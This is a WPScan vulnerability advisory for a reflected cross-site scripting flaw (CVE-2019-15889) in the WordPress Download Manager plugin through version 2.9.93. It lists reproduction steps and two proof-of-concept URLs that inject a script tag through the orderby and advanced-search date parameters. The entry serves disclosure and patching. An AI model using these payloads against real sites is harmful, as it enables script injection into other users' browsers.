WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)

Description

In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date .
By adding parameter "> and add any XSS payload , the xss payload will execute.

To reproduce,

1. Go to the link where we can find ?orderby
2. Add parameters >" and give simple payload like <script>alert(1)</script>
3. The payload will execute.

Another reflected cross-site scripting via advance search .

Proof of Concept

https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc

https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

Affects Plugins

download-manager
Fixed in version 2.9.94

References

CVE
CVE-2019-15889
URL
https://plugins.trac.wordpress.org/changeset/2070388/download-manager
URL
https://packetstormsecurity.com/files/152511/
ExploitDB
47350

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

MgThuraMoeMyint

Submitter

MgThuraMoeMyint

Submitter twitter
mgthuramoemyint
Verified

No

WPVDB ID
333d63eb-7846-4cc3-abd9-b00e12b25037

Timeline

Publicly Published

2019-04-17 (about 3 years ago)

Added

2019-04-23 (about 3 years ago)

Last Updated

2021-01-19 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin